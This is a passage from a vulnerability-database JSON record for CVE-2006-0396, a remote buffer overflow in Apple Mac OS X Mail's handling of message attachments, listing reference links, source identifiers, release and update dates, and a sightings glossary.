"url": "http://www.securityfocus.com/archive/1/archive/1/427601/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/25209"
},
{
"trust": 0.4,
"url": "http://www.apple.com/macosx/"
},
{
"trust": 0.3,
"url": "/archive/1/427601"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/vulnerabilities/apple-osx-mail-cve-2006-0396"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/1583/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "http://rfc.net/rfc1740.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "PACKETSTORM",
"id": "44647"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "PACKETSTORM",
"id": "44647"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-17T00:00:00",
"db": "CERT/CC",
"id": "VU#980084"
},
{
"date": "2006-03-14T00:00:00",
"db": "VULHUB",
"id": "VHN-16504"
},
{
"date": "2006-03-14T00:00:00",
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"date": "2006-03-13T00:00:00",
"db": "BID",
"id": "17081"
},
{
"date": "2014-03-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"date": "2006-03-14T22:24:53",
"db": "PACKETSTORM",
"id": "44647"
},
{
"date": "2006-03-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"date": "2006-03-14T11:02:00",
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-29T00:00:00",
"db": "CERT/CC",
"id": "VU#980084"
},
{
"date": "2018-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-16504"
},
{
"date": "2018-10-19T00:00:00",
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"date": "2006-03-15T12:15:00",
"db": "BID",
"id": "17081"
},
{
"date": "2014-03-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"date": "2006-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"date": "2024-11-21T00:06:21.873000",
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability",
"sources": [
{
"db": "BID",
"id": "17081"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.